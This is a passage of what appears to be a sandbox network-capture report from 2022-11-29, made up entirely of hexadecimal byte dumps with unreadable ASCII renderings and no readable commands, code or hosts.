1b 57 7d f5 32 15 e0 9d 8f 6d 5c f7 b3 ce 36 07 4a 32 68 74 70 4b fd 19 f1 64 c8 c3 62 37 54 67 f1 bf 24 20 7c e2 62 fd 13 cd 8b 87 12 da 55 2d 42 cc d5 c1 f5 f4 fb d7 17 f5 d7 68 49 44 51 0f a0 78 bc 1f
                                  Data Ascii: 'S}^!;mV?eTG-<v0Ua~]#`+|~}"fI ~Q]~#&@fo.E+oB#l-EVo3-VKLYjqm6,>jlb7-W}2m\6J2htpKdb7Tg$ |bU-BhIDQx
                                  2022-11-29 15:56:46 UTC2304INData Raw: 74 1f 33 80 f6 92 07 b1 05 bf 2e 08 c6 70 29 2c ee 01 87 cc e4 3a 66 ab 32 ff 7c a9 d3 e7 67 db f1 5e 88 64 d0 0c 02 ec 7f c0 3d 12 e6 ca 19 b7 fa e5 9c 4a 81 ab bd 2c 2e df 79 9b 1e bb d3 72 3b 52 dc 4b ec 18 4e 38 6d 30 d6 87 1b be f3 a9 e8 34 2e 05 b4 d6 62 df 9d 8e 4d 8a e3 60 f9 71 92 e7 1b 53 c6 fa 88 af 39 e9 cb 41 50 b6 22 34 1d 5a 4d 7e 18 c5 45 ea 5b 6e 14 70 75 5e 4e ea 99 54 c3 eb c4 79 42 e9 13 7d 97 a1 d8 83 4b 52 94 ed 72 92 53 63 cd cc 7e be 4f 9d 40 6a 0b b9 af c6 0b 96 62 cb 1a e4 64 79 a1 93 17 88 cc 1f 9e a7 6d a2 8f e6 1a 04 8a d3 82 a6 93 3e 3f 18 ab 8c 35 a4 66 56 57 0d 7a 2d 27 98 e6 23 6f 7d a5 fb b3 04 9a d5 f9 74 43 4b 34 04 c6 f1 6a b4 80 35 bb c3 6f 51 c2 52 fe af c3 f6 63 c7 d4 2c ca da c0 b1 c8 bc 65 eb 07 df 2b 0b 27 35 b7
                                  Data Ascii: t3.p),:f2|g^d=J,.yr;RKN8m04.bM`qS9AP"4ZM~E[npu^NTyB}KRrSc~O@jbdym>?5fVWz-'#o}tCK4j5oQRc,e+'5
                                  2022-11-29 15:56:46 UTC2308INData Raw: c1 f9 c7 7b 68 13 ce 7c 72 3c 7e 51 4f c8 54 6f d9 6a 30 9f 2e ad d9 49 ba b3 e3 3c e1 ce 85 90 39 c6 e8 30 e9 28 1c e7 bb a1 e7 7c a9 d2 3f a1 71 93 a8 69 1e b6 06 ef cf c1 ae 01 45 6c b6 52 79 d7 68 0e 16 e2 2c 13 9e ef 44 f9 74 cd d8 27 1e 7d c0 43 6b 95 6f 80 8d 03 63 50 6c f2 0b f2 0f 37 0e 65 1d 7a dc b5 e9 a2 0d 6d 1a 58 3d 12 ce 4d 33 62 28 67 4d 70 55 54 ca a2 86 51 44 ab 19 78 47 b4 52 22 55 9e f6 e7 00 62 c2 59 db 40 48 02 ec c1 04 31 58 7a 51 4f a0 46 6d 4c 17 d2 f6 dd f9 db 67 6c 02 c0 a8 84 b7 0e 71 b8 8b 7c ac ea cc eb 16 8d 9f b3 ae e4 7d 12 c8 8a 12 4e e1 d8 7f 50 82 ae 65 f8 8f a3 ac 71 db e3 8e b5 5c aa a7 41 dd 21 65 a6 2c 55 ee 51 3c 54 b4 7f 6b 14 d5 75 fb 73 9e cf 3c 63 7a aa 5c cb 68 9e 03 3b f1 4e 2b c3 f2 51 a6 d7 5b 01 48 dd 2f
                                  Data Ascii: {h|r<~QOToj0.I<90(|?qiElRyh,Dt'}CkocPl7ezmX=M3b(gMpUTQDxGR"UbY@H1XzQOFmLglq|}NPeq\A!e,UQ<Tkus<cz\h;N+Q[H/
                                  2022-11-29 15:56:46 UTC2312INData Raw: 3e 9f d2 63 43 da 35 f7 50 29 6c eb 3a 0f f9 b3 7f aa 98 00 a5 21 92 86 16 aa a3 f3 79 6b bc 72 97 2e 3f d6 a7 7c 8a 0e 2d 14 65 f3 44 7c 42 3d 67 43 0d 0b 26 fe f2 4d 68 11 24 0b c4 5d 5d f1 3e 2c 59 1a d1 8c 53 26 63 c5 c9 99 40 be 48 93 4a 24 51 dc e0 b8 4f c6 63 ab d2 ef d8 12 1d a0 1f 4c ad ee 4b ca 7b 23 27 19 0a c9 ab 52 aa 3a 3e 66 87 90 ac 13 21 1a 00 92 bd ef 9c f1 84 10 e1 1b c7 64 c7 7a c6 56 7b 71 5e 13 23 2a 35 a1 5f 3f 92 5f 52 3b e3 a9 b1 76 dc 5b 64 4c 66 1a 37 00 c2 a4 11 a0 f0 d7 8b 04 92 7d e3 4c f5 1e bd 1b a3 cb 86 94 00 1f e7 05 ad 56 54 7d 65 30 4b fc 5a e4 b4 ab 76 ff ee ab 81 d6 72 e6 0f 73 26 5e c6 61 9d c6 78 11 f1 79 35 ec c7 d7 2f fb e1 e3 27 fa 8c f1 0c 15 34 3b 39 ac 98 2d df 79 8a 4c 30 dd 6d 4d 5f 79 65 f2 08 8e 0a 94 e5
                                  Data Ascii: >cC5P)l:!ykr.?|-eD|B=gC&Mh$...,YS&c@HJ$QOcLK{#'R:>f!dzV{q^#*5_?_R;v[dLf7}LVT}e0KZvrs&^axy5/'4;9-yL0mM_ye
                                  2022-11-29 15:56:46 UTC2316INData Raw: d0 e1 03 7a 9b d0 3f 53 b8 07 55 0e 5f d2 39 e0 31 1a da 2b e5 95 13 eb 8e 92 19 d7 f8 66 f2 43 34 ae ac 41 28 69 0a 37 5d 39 52 2b 60 8e b8 85 03 d2 d1 92 ea 14 85 c6 83 91 51 4a dd 73 e7 5e 40 33 47 7f 0c 98 a2 81 13 c0 c2 43 7d 23 a0 7c 49 6e 05 6f 7c e0 67 6f dd a5 39 4c d5 95 2a b0 50 f9 ba 47 c8 f9 dc 34 44 07 a9 36 49 82 fe 43 00 be 1f 00 d7 85 c5 b2 ed 9d e8 da ef 52 d8 d4 07 6b ef 9e 29 92 40 10 39 d8 45 23 cc e2 01 f6 26 95 93 d5 4a ef a6 c5 df 53 f4 67 ff 4f b3 75 5a f3 40 aa 55 18 51 04 43 a5 49 1e c8 e9 79 95 70 be 6e 1d a0 a9 4a 76 17 f5 55 31 39 58 93 b3 53 74 9a 01 12 68 8b bd ef ce 65 13 2d 0c 26 ff 8f 87 e8 c0 93 4c c2 c3 09 1d 04 bb da 32 b3 29 c6 61 6a a2 cd ec e3 d6 ab 51 b0 ec 1e 05 93 b8 63 9c 1f f9 22 de 0e 5d 02 3b e0 e0 d9 57 90
                                  Data Ascii: z?SU_91+fC4A(i7]9R+`QJs^@3GC}#|Ino|go9L*PG4D6ICRk)@9E#&JSgOuZ@UQCIypnJvU19XSthe-&L2)ajQc"];W
                                  2022-11-29 15:56:46 UTC2320INData Raw: 81 6d 33 ec 96 eb 99 ca 14 5c 65 81 c3 d6 ad 38 f7 21 4a 89 31 14 e1 e9 e5 77 cb 79 c6 fa 4b 7e 5f 7b 60 1b 11 d1 27 33 d5 2c 32 8e 2e 23 b9 2d a8 e2 fa 37 85 ef 67 db da b8 50 37 f7 00 14 16 12 29 46 75 97 76 76 bb fb 33 e7 93 1c a6 39 98 17 d0 ef 80 f5 e4 34 a3 db a3 f2 5b f7 25 96 02 13 39 fa fd 60 62 43 3e 74 3a 3a e9 2b 0b dd 78 ec d8 9e 42 bc 74 ec c1 c3 05 6a 61 b9 4e ab 36 9e 99 e8 36 15 38 85 e0 a1 bc c2 50 e4 36 a6 fa 9b b9 26 5b 0b e2 88 a2 c2 bb dd c8 37 ff a6 cc f2 ca 0d ba 86 b5 ca 9b dc 6e 67 7b 68 ec 88 18 c6 62 0f c0 64 c4 e4 ca 1b ad 21 d8 2f 15 aa d4 5a 80 eb 47 7d 0f e1 39 ca b3 e7 55 9e 9a e3 ab 84 22 07 7b 79 07 af 5d f6 bd b5 8b 2f 3e 17 59 e9 ff 03 e7 95 b8 31 06 5c d8 3f 02 27 88 49 7d 8e af b0 5d b2 f1 da 0c 2d f0 07 6e 6a c8 03
                                  Data Ascii: m3\e8!J1wyK~_{`'3,2.#-7gP7)Fuvv394[%9`bC>t::+xBtjaN668P6&[7ng{hbd!/ZG}9U"{y]/>Y1\?'I}]-nj
                                  2022-11-29 15:56:46 UTC2323INData Raw: fe af cc a0 de da b8 a4 7c 77 f2 c5 63 26 bc 52 c2 dc b8 41 c7 2e 8d ce 66 27 78 a9 71 db 85 a9 7c c1 83 12 7c 54 cc 4c 57 94 0a d6 93 7b 8d d9 3a 63 55 31 1f af 34 c9 3d 64 68 75 01 a1 6e 63 88 30 61 a0 d5 77 1d 68 b0 1d 5e b2 06 a3 14 c4 09 f9 43 ac bb 60 5e f0 a6 e9 d6 8a 44 09 a2 04 7b e1 5e 64 5c 1f 7b 80 71 80 94 54 a9 48 4d 58 75 27 31 43 7a 20 4f 41 3d 61 70 39 89 3e 6b ec 62 1e 7d db c8 79 b0 c7 4a 93 9b ec 64 98 f7 59 bf 15 00 aa 7a 08 29 f3 49 68 f9 40 90 4e 62 77 89 cb 73 5f 7d e8 f8 2c a8 56 73 59 d4 5e 5f c3 5b 5a 4a fa 12 23 5c c1 3e 41 08 ad 06 1a 6f c8 c7 b0 50 27 34 ed 01 e1 4e 64 4a 83 6d 3c 90 c0 d0 74 6a 17 84 46 30 9e 88 c6 be ee 9a 35 ec ce 27 75 f6 fc 15 20 77 1f c5 84 43 4b 9d b9 5b 5a 7b 39 9a 17 6c b9 f8 35 e0 fb ff 30 3f f6 a3
                                  Data Ascii: |wc&RA.f'xq||TLW{:cU14=dhunc0awh^C`^D{^d\{qTHMXu'1Cz OA=ap9>kb}yJdYz)Ih@Nbws_},VsY^_[ZJ#\>AoP'4NdJm<tjF05'u wCK[Z{9l50?
                                  2022-11-29 15:56:46 UTC2327INData Raw: 99 87 01 e0 3e 4f 37 71 98 61 17 6b 2b 15 98 d7 69 ea d5 45 82 4e f0 3c c7 b1 e4 36 33 42 ae 94 97 44 99 ce 6e 20 07 ef 0e a7 eb 79 d3 38 ba 97 5e 11 c6 9a d1 67 d5 87 3d df 0f 1d 72 f5 0c 21 82 dd f5 28 e1 14 ff 9c ea 15 dc 98 e6 a9 5d ea b7 58 5a 38 53 3b 92 8e 7b 25 0d c2 86 bf f4 eb 87 b7 63 f8 5d 00 99 ec 55 23 fc dc e6 32 f6 d1 1d 0d 1f 67 06 22 2e e4 e0 4c 2d 93 40 b7 34 42 39 ec 09 82 06 22 16 3c 3a 48 1a c2 70 4e 56 1f de 9c b2 04 07 8d 12 94 ac 2f a5 3f 59 40 52 98 1f cb f9 76 9d 22 b8 fe e6 23 a2 d3 1c 41 d8 86 0a e3 94 c5 aa b3 0a 9c 52 87 65 10 95 ec 09 bf fa 50 11 34 64 c9 2f dd 70 a7 ea 86 55 61 6c 8d eb 3d f8 5a 23 74 18 3d c7 0b 60 cf 7d f6 f1 ad 76 8a 93 fd e8 0c 64 d2 25 f6 f4 2d b9 f1 a3 87 26 b8 ce bf 05 3e 76 96 47 be 71 b6 24 9d c0
                                  Data Ascii: >O7qak+iEN<63BDn y8^g=r!(]XZ8S;{%c]U#2g".L-@4B9"<:HpNV/?Y@Rv"#AReP4d/pUal=Z#t=`}vd%-&>vGq$
                                  2022-11-29 15:56:46 UTC2331INData Raw: c3 07 70 fc 7e 88 02 2c 84 ec aa a3 d3 74 bc 33 98 81 6f 69 c9 71 48 92 ef 10 41 3f 47 21 53 ba 4b ae 0b c6 09 05 3c ce ce 38 2e c0 7f 4e 8f 5b 95 1a 12 09 d1 77 0f d5 39 96 3c fd f9 be 5c 04 e2 16 e1 f5 ed b2 7c 5e 31 c6 7a e0 d7 94 cc 1a e7 43 9b 96 11 6a d4 c8 b4 29 1c ab d3 38 b1 5d f0 72 27 6a 5e 4a 79 a1 fe 3f a7 bd 13 26 eb 50 4c 28 b0 65 62 87 02 5f 11 fc 22 31 b7 10 89 81 db 55 ea 50 4a 08 2b 71 69 0a 1a aa 6d e8 dc 2e 3b d3 f5 ae e6 79 ba d9 37 62 f9 1b 46 92 ae 2a 25 bf 64 55 81 fa 70 1b 24 23 8d 2b 7b e9 30 33 2d 70 e4 44 3e 6a a0 96 b1 88 34 99 ce ee 3e d7 bd c5 5b 91 38 da 5a f1 44 ea ed e0 e2 42 3e 39 4e c2 de 31 ac 26 8b b4 57 f1 77 8d ea c8 1a e4 39 cc ff 47 01 1e f8 90 56 d0 41 6f fd 7c cf a6 70 50 a6 d9 da 41 bd 2e c4 9b 27 86 12 07 b0
                                  Data Ascii: p~,t3oiqHA?G!SK<8.N[w9<\|^1zCj)8]r'j^Jy?&PL(eb_"1UPJ+qim.;y7bF*%dUp$#+{03-pD>j4>[8ZDB>9N1&Ww9GVAo|pPA.'
                                  2022-11-29 15:56:46 UTC2336INData Raw: d4 36 82 32 d3 0d ab b1 a3 09 c6 f4 7b 0b 52 02 01 54 c8 de 9e e5 87 5d f5 dc df 63 fd 9d c8 9a 70 d1 aa 3b 2c 3d bf 81 1b 0f 21 b9 e7 dd 66 2f a9 5a a3 ce 0e da 19 20 89 70 1d 5f 8b 03 e4 fb bd b3 3e 96 69 34 e2 74 ff 38 1b 5b 33 27 6b 41 bc a2 bb 84 d9 72 2c 1c d2 a2 6c 85 b9 6a 78 db 2b 98 65 fb 12 6b c8 48 e0 c7 7e 53 e5 9f 96 21 9b 60 6f ba 45 f5 c5 a7 a5 41 8a 79 e6 19 4e 9b 08 ee 69 06 9d b9 af e4 63 e5 a4 d4 40 b7 77 28 77 9d 2e a4 45 95 6c 3b 0a 17 31 90 2e 07 62 02 7d 89 c0 fe 8c ab 5d de 76 4e 63 80 64 c6 74 5b f3 4c 8c 78 73 56 5d 52 d3 ba 3e 69 79 12 f3 a2 45 4a b9 3d 12 a4 5e dd 71 1a df ad ba d5 94 f3 5d 95 14 46 f5 af 2c af b9 a1 2a 6e 8d 8a 7e 2b ff 41 cc 18 48 08 26 ef f8 bc 67 ca f1 5c 08 e2 3c 04 a9 bd 9a 96 8e cd d3 a9 4b 57 78 b4 91
                                  Data Ascii: 62{RT]cp;,=!f/Z p_>i4t8[3'kAr,ljx+ekH~S!`oEAyNic@w(w.El;1.b}]vNcdt[LxsV]R>iyEJ=^q]F,*n~+AH&g\<KWx
                                  2022-11-29 15:56:46 UTC2340INData Raw: 49 ca c1 6a 71 2a 09 93 a4 81 95 18 e6 8c ed 25 bb c9 18 ae 94 fb c8 f0 cd eb 52 41 80 bc 36 5f 68 40 b2 1f 95 8e bf 5e 8f 1e da d3 9b 42 ec 2a a5 58 3c 42 71 f3 4f 06 ec 4f b5 4a 6f b2 38 0f 7f 38 eb 6d 1d 5d 0d 5f 4a 4c f4 55 39 31 4c 6d bb d0 6c 19 b4 77 6e f5 3f 43 8a 4d c8 d2 6d 0a d9 8b c8 13 33 52 f7 07 07 ce 0f c7 3f 17 0c a2 b9 d2 d2 cf 5c 3a 48 65 2f 60 38 93 c4 55 a8 b1 99 bf f4 40 24 2f d0 a2 fa e1 ff 66 22 ef 84 92 fd 08 1e 08 e2 c7 b9 7f 8e 50 eb ee 0c 39 45 41 b1 72 c5 71 64 58 20 50 0f 9d b0 25 10 0b 99 07 44 3e cf 58 8b 7f 39 06 65 51 a3 88 b8 d7 90 e0 7a 60 4f de fc 42 c0 c1 82 b8 5a 06 ed 78 f4 8b a1 56 02 ca 16 0d 02 38 0b 04 c0 89 83 71 4e 71 7c 56 a1 ba 05 90 0c 29 37 de 8b df b8 5b b8 32 bc 36 14 0a ed 31 b0 95 28 1c 46 74 a0 0b f5
                                  Data Ascii: Ijq*%RA6_h@^B*X<BqOOJo88m]_JLU91Lmlwn?CMm3R?\:He/`8U@$/f"P9EArqdX P%D>X9eQz`OBZxV8qNq|V)7[261(Ft
                                  2022-11-29 15:56:46 UTC2344INData Raw: 28 8f d4 ba 19 a2 af a9 80 87 bd 5f 94 81 17 2e 2a 7a fb 64 ff 8c 24 86 0f ce 8f 12 2d b1 63 bd 80 d6 87 55 73 99 9d 08 2e 8c bb 38 80 4e 53 c9 cb 6c 7e c7 4f 9b 21 fe db 76 1c cc d4 80 22 4e ea ab 1f 98 00 ec a0 21 49 d1 22 3d e2 e9 3f a5 cd b0 a7 f3 ae b9 85 db 52 3d 91 a4 d3 2e 14 48 87 a3 3e e1 46 b6 46 79 59 99 1f 92 89 d6 02 1a ac 60 47 94 09 75 0f 45 8f c8 d8 ef ac c7 28 23 40 67 0d b8 b4 62 fc 05 0d 22 7c d1 5b a3 14 5b 39 d3 7d 0a 17 9c a0 24 93 bf 0e 4f c3 4a 5f a2 64 a9 da d6 60 ad 66 73 40 0a 64 8b 2c f9 a4 47 06 92 4c 71 0c 0d 88 14 74 86 75 b0 cc ef 13 e1 83 23 8e 83 84 04 5f 5b 8b ae 48 9f 8a 8a 0f c8 42 15 7f de b5 40 15 d7 ce 9d be 18 8e ae f6 9a 69 2d a7 eb f5 77 3e fe cd 22 6b 79 98 70 e6 a9 68 a9 ff f6 d5 b2 68 89 31 25 53 18 b3 14 04
                                  Data Ascii: (_.*zd$-cUs.8NSl~O!v"N!I"=?R=.H>FFyY`GuE(#@gb"|[[9}$OJ_d`fs@d,GLqtu#_[HB@i-w>"kyphh1%S
                                  2022-11-29 15:56:46 UTC2348INData Raw: 3d ce 9f 4e 29 8a d2 d1 a7 03 cd 59 f2 2f 96 85 17 f4 05 ac c3 05 3f c2 24 86 9c e8 2a 39 0e a9 97 9f f4 5f c5 67 27 8f c7 e0 8e e9 f4 02 7c 1a 89 9f 4c c4 a1 3a c5 8d 67 e5 46 f7 fc c6 58 80 8f 75 3b 50 f7 ba 53 d1 59 e6 ce 0a fe 38 c0 a3 47 92 7b 2b e4 80 d5 5c 20 ae 61 e6 74 bb d9 59 47 62 63 3b ef 43 86 44 a0 b5 a3 30 4f d9 2a 2a 2b 29 4a 31 74 1c af 12 d3 2d a9 31 e6 1e ff f6 45 eb 8b 43 5d 60 41 b8 d8 70 25 dc da de bb 2b ac 97 1a 14 8b 41 e1 65 f2 60 3d 89 fe 78 da 3b 0e f2 c7 63 94 e8 e4 95 0c e8 b4 88 b2 86 55 61 f3 9f 67 13 6e 49 c5 07 92 c3 4d d4 0d 4d 2f 18 48 fb ee 07 bd 62 18 31 fd 96 f2 d7 1b 53 67 dd 61 dd 42 5f 31 43 77 90 68 2b e4 52 1a 7c 8d 47 4d 5b 21 bb 7c 0c 71 39 31 e7 d4 82 e8 cc 51 f6 20 c7 36 19 9a 79 c0 4d 0b 3f 76 8c f1 5c eb
                                  Data Ascii: =N)Y/?$*9_g'|L:gFXu;PSY8G{+\ atYGbc;CD0O**+)J1t-1EC]`Ap%+Ae`=x;cUagnIMM/Hb1SgaB_1Cwh+R|GM[!|q91Q 6yM?v\
                                  2022-11-29 15:56:46 UTC2352INData Raw: 81 11 fa 8a b2 f8 34 c5 7f c7 7b e6 b0 2a 6b b9 2f 26 d1 a4 5b 33 51 c5 ee 0b 4b 12 80 b5 64 e4 57 7b b5 48 cd 2d c7 80 7d 9f 3c 88 d9 50 c8 7c 34 5e 84 5d 4b 07 47 09 af c0 aa 3f 6a f6 e9 75 45 c2 67 4c 52 56 f0 fa 0d 9f fb 34 de aa 75 bc 8c 27 38 89 0e 6b 74 6a 2f 0b 95 ea 51 bc 39 1c ae 4a 56 69 e0 b6 26 9c 8d d4 e4 6d 7f ca de 09 ed c0 ec 0a 18 e5 e8 94 83 fb ca 5d 6c db 34 72 ff 5b 73 37 a5 3f 0a 32 c8 46 f8 2a 4d 50 f9 83 e4 8f 6a 2e b4 a7 97 49 22 59 ce 58 3a cc 78 b5 59 3b 41 30 39 c8 67 e8 77 a8 e7 85 bd e7 b3 74 79 37 d3 bb 03 61 d3 3a f2 67 c3 e8 75 16 7d cf 83 81 50 97 ba d0 ad da 4d a0 c3 ea b0 24 d0 03 8a 3e 5b 65 0e ac ed 8e e9 08 5a 73 e6 66 cc f0 8a f6 43 9a 56 ce a4 bd 78 29 7a 4c 53 e4 aa c8 d5 0d 1d 6f d1 c8 c9 cb 7b 86 68 ad 8a b1 bf
                                  Data Ascii: 4{*k/&[3QKdW{H-}<P|4^]KG?juEgLRV4u'8ktj/Q9JVi&m]l4r[s7?2F*MPj.I"YX:xY;A09gwty7a:gu}PM$>[eZsfCVx)zLSo{h
                                  2022-11-29 15:56:46 UTC2355INData Raw: a8 1b fb 87 8a 20 8e ee 41 99 34 67 1c 62 d5 2f a9 60 6a 4c 61 c6 37 b7 17 23 73 cf 37 49 92 74 80 e9 32 8b 5a ad 96 19 7d ea 36 e1 86 d2 f1 0c 49 18 14 1b 1f 6b 0f f4 36 21 31 f6 e1 58 51 f6 9c 3e 31 0e 88 6f 1a c6 e6 0c 4c 6f a5 91 99 95 10 b1 fa 7f 38 97 b2 5d 00 12 3f 16 21 02 fe f5 1b f4 af 7e 82 ba a7 5b 41 3b 24 b4 6d 82 6c ca 47 61 f5 d7 31 e6 9b 36 20 7f 95 ca f7 f0 37 a0 c5 85 c5 9b 92 0b 4e b5 51 9c d9 16 44 85 13 c7 ed e6 91 33 b2 72 c9 b8 12 73 c7 5e 2f 5c 22 c7 5d f2 ad 1e 6d a5 35 ce 1c 51 99 3f 3d d3 2f 1d da e0 27 99 c7 9e 29 9f e2 2b f1 4b 6a f8 f1 ab 68 09 7d ea 7c b9 5a 04 73 ea 60 9d f9 b0 76 d1 2e c8 f6 69 68 56 d4 b0 37 02 f2 6f 73 74 43 00 fb 6f a2 5a 91 90 be 08 88 46 85 10 97 19 f8 93 55 36 7c 6f bf 02 09 a6 15 c8 ec fa f1 50 ad
                                  Data Ascii: A4gb/`jLa7#s7It2Z}6Ik6!1XQ>1oLo8]?!~[A;$mlGa16 7NQD3rs^/\"]m5Q?=/')+Kjh}|Zs`v.ihV7ostCoZFU6|oP
                                  2022-11-29 15:56:46 UTC2359INData Raw: ad 49 29 25 08 bd 77 2e 87 25 36 aa 9e a5 b9 3f 46 1e df 17 c6 a4 f1 88 b6 9e 0f 6c 6f 23 1a 1c bd ea 6b bc 86 68 03 b3 56 78 8e b0 ff 76 fb ec 4f c6 0c b9 b6 a9 6b 61 36 c4 9c b6 a7 b9 e8 a3 d0 0a ed 99 3e e7 b5 e7 ba ee 79 4a 54 a7 49 66 3b 4f ea 1c 16 5e 0e 0b d0 9b f2 1e d5 0b 0d f1 12 cc bc 38 fb f2 f0 b4 19 89 8e fc 5e 16 04 05 63 3d 7f 5b 20 ce cf 1c f8 00 bb 6c f5 f2 3f 36 3e df 54 02 7d 2b c1 12 00 e9 e0 0c 32 49 31 3b fd 84 a6 4e 93 0b c9 1a d3 5a aa 2a 7a e5 8d 57 19 8c 35 ae 65 75 47 7e 5e bc fc 7e d5 3a c4 02 84 60 7c 41 83 d9 e5 99 41 98 9c a0 12 2b f9 50 c1 e3 f5 36 27 bb 6d 08 89 10 91 cf 44 5c b8 ed ac fe 87 f8 4c 38 03 b7 a8 6b 8e 2e c9 c0 e0 ec 8a e5 a0 2f d3 a0 32 82 47 ad 91 67 2e 33 a9 f9 95 bc 27 6a 6c 2a 7d a9 13 12 ff b5 fd ed d8
                                  Data Ascii: I)%w.%6?Flo#khVxvOka6>yJTIf;O^8^c=[ l?6>T}+2I1;NZ*zW5euG~^~:`|AA+P6'mD\L8k./2Gg.3'jl*}
                                  2022-11-29 15:56:46 UTC2363INData Raw: 66 28 2c ea 62 ab cd d8 a6 24 d8 f2 1a 7d 45 b4 7c 88 ce 3c 60 fc bc 24 2a 50 fe 8c 02 d1 a9 b0 24 8c 87 5c 27 e1 a5 b7 31 a7 13 f0 82 48 90 23 41 44 96 e6 14 df 08 a8 37 b6 50 8c f1 3e 3c bb 62 b6 4d aa 6d de 6b 26 d9 53 1e f9 b6 0c 90 43 22 d3 65 84 1b fe 81 03 6a be 40 bd 86 81 cc e1 04 bf b4 33 83 2b 88 4a ea f9 4c 71 97 c4 06 06 ec 7b 39 84 b7 dd 60 d9 da e3 03 9a f2 b5 e6 66 b4 e6 33 aa bc 50 f5 e9 74 aa 59 6f d5 92 77 60 49 bc 7d 6d e5 51 6b 69 9c e5 7f 6b ee 78 b7 0d 44 62 98 32 8d ef c5 06 7f e3 40 c9 ae 4b 28 2c 27 77 03 0b 0d 46 80 6f 86 af 6a 89 23 04 ce a1 3d bc 2e 48 52 9b 78 05 67 37 db 73 e3 57 46 aa f2 f6 9b 4e 12 28 b7 63 4f 89 d0 0e f3 e2 b4 de 19 8b 91 c1 10 7e 0b ea 50 48 b3 b8 aa 9b 48 9e 8b 12 22 09 f3 85 a1 52 01 ad 0e 71 16 18 3f
                                  Data Ascii: f(,b$}E|<`$*P$\'1H#AD7P><bMmk&SC"ej@3+JLq{9`f3PtYow`I}mQkikxDb2@K(,'wFoj#=.HRxg7sWFN(cO~PHH"Rq?
                                  2022-11-29 15:56:46 UTC2368INData Raw: 92 d5 38 cf d9 50 fc 3e cf 97 b2 2e 3a 3b 2b 79 a5 a5 23 b8 d2 6b 04 86 83 b7 97 58 29 f3 9c a8 29 2f 5e d2 25 a6 b4 47 00 35 c1 d1 ef 09 56 e3 93 c0 c4 c6 7c 1c fb cf 4b fc bf 8e 9e e1 43 4a 3b 50 99 55 2f 9b d2 c2 4e 1e b7 0b 51 cb ea 89 0e 77 f3 86 58 8f 34 99 3a 35 8b 17 39 ae 49 e5 8f 78 7d bc e4 19 82 c4 67 9f 8e 84 f2 40 2d 54 b0 2c 2b 00 7e 4f cb ab 20 82 3b 12 f3 af 3b fd 44 e0 74 75 e8 aa bd 38 19 e4 14 ba cc 54 ea 5f c9 ed 4d 6c 08 7b a4 fa 85 ab 6f 24 3e 1a 33 1f 56 5b ce 20 c0 7a f2 4a 21 da 01 6b f0 7c 5a 41 be 92 2f ea f5 e4 20 8e 5d 86 49 54 32 3b 65 74 3f c4 81 f7 9f 52 fb b2 6b 01 78 9d 70 59 79 cc 4a 81 a8 03 4a 8b 37 e7 72 60 62 f1 06 1d 53 a0 56 a0 f7 ef f8 a6 4a 16 c5 d0 f6 ca cd 4e 7c f8 38 8d ca 02 c6 58 50 65 7a 8b 1c 60 f4 25 e2
                                  Data Ascii: 8P>.:;+y#kX))/^%G5V|KCJ;PU/NQwX4:59Ix}g@-T,+~O ;;Dtu8T_Ml{o$>3V[ zJ!k|ZA/ ]IT2;et?RkxpYyJJ7r`bSVJN|8XPez`%
                                  2022-11-29 15:56:46 UTC2372INData Raw: ac 44 1e ba 9a e5 23 47 75 53 d8 86 87 bb 63 65 ec 5f c8 35 63 08 8f 46 91 73 b5 b9 9c 54 5d 5e 7d 90 e9 b1 81 fd 1f 8e 6d dd f9 34 f4 cc c4 59 73 84 4e 74 4c 33 df 06 5c c6 24 00 2c 01 2f 6d 99 1c 1d 5a eb 9c 95 e1 72 2b 6f 1b 87 12 2d a7 2b c7 d7 e9 0c c3 62 bc 34 72 f9 44 c8 6c 1e 56 23 70 48 c1 16 3f c0 49 4d 02 09 de 59 a8 b8 46 a8 02 f1 8c 0d 76 e3 bb ad b4 f5 e8 31 fb 31 09 7e e0 69 6f 6a 06 a5 1d 84 6c 89 b5 fc c9 59 c4 0c 0e 7f 46 ef 93 0b 58 92 d3 74 23 fb 37 6d 73 8e 37 49 3b 5d 00 e5 b7 d4 41 48 a1 a6 19 d2 2d 96 7c 8b f1 cf 5b 04 e1 ee 2c 38 24 a5 fe 35 d3 57 ad cf 76 c1 2a f9 26 af 6b 06 f3 2c 00 73 7b 2e a6 ca 98 0a e6 30 26 33 af c2 a6 78 b7 00 a1 41 81 f7 ec 3a de 5a c3 e0 a9 43 b7 c8 f5 e7 bd 3b c1 5c d7 56 c0 58 54 31 5d fc 62 14 a0 3a
                                  Data Ascii: D#GuSce_5cFsT]^}m4YsNtL3\$,/mZr+o-+b4rDlV#pH?IMYFv11~iojlYFXt#7ms7I;]AH-|[,8$5Wv*&k,s{.0&3xA:ZC;\VXT1]b:
                                  2022-11-29 15:56:46 UTC2376INData Raw: ae 85 0b be 42 18 03 16 6c 6c 74 c8 54 8e 3d b2 71 4d 28 ab 92 28 3a b8 4b 2b d2 91 84 72 4a 55 03 ff 3a 0f 5c b7 14 45 6a b0 d1 0e 40 2c 80 8e 93 98 20 52 ff 33 dc a6 3b a3 a6 d0 be c3 a5 c7 f0 dc 7c ed a1 a0 24 9d a1 ab 68 64 47 bd 8b 19 55 aa 83 fd 7d 3c 37 d5 55 8b 09 63 55 ac 19 0c 6b 4f df 30 0d c5 46 e7 15 b4 41 c4 5c 79 ed 4a 37 2f 19 71 fb 65 8b cd 76 9a 30 1b a3 d0 9f da 63 00 25 3a ef e5 43 e3 47 95 bf 66 2c 4d 22 81 dc 4b 1c 72 f5 4e 9f df c2 f2 0e 13 92 f8 34 2e b2 33 8d 56 96 61 30 ff 9b f0 05 20 74 a4 3a c7 34 2f ba ee e5 12 53 48 1e 4c 86 e5 e9 9a fa 25 77 91 21 2f 5f c6 3b 19 57 30 d2 26 f8 a3 7b 12 3b 05 1b 63 51 ff c7 ef 5d 55 c1 eb 33 95 99 e1 5d 80 51 19 6c 76 80 9b 45 49 67 79 76 b0 51 b8 08 9f a1 8f 34 16 54 4c ad 12 e6 ae b5 71 b0
                                  Data Ascii: BlltT=qM((:K+rJU:\Ej@, R3;|$hdGU}<7UcUkO0FA\yJ7/qev0c%:CGf,M"KrN4.3Va0 t:4/SHL%w!/_;W0&{;cQ]U3]QlvEIgyvQ4TLq
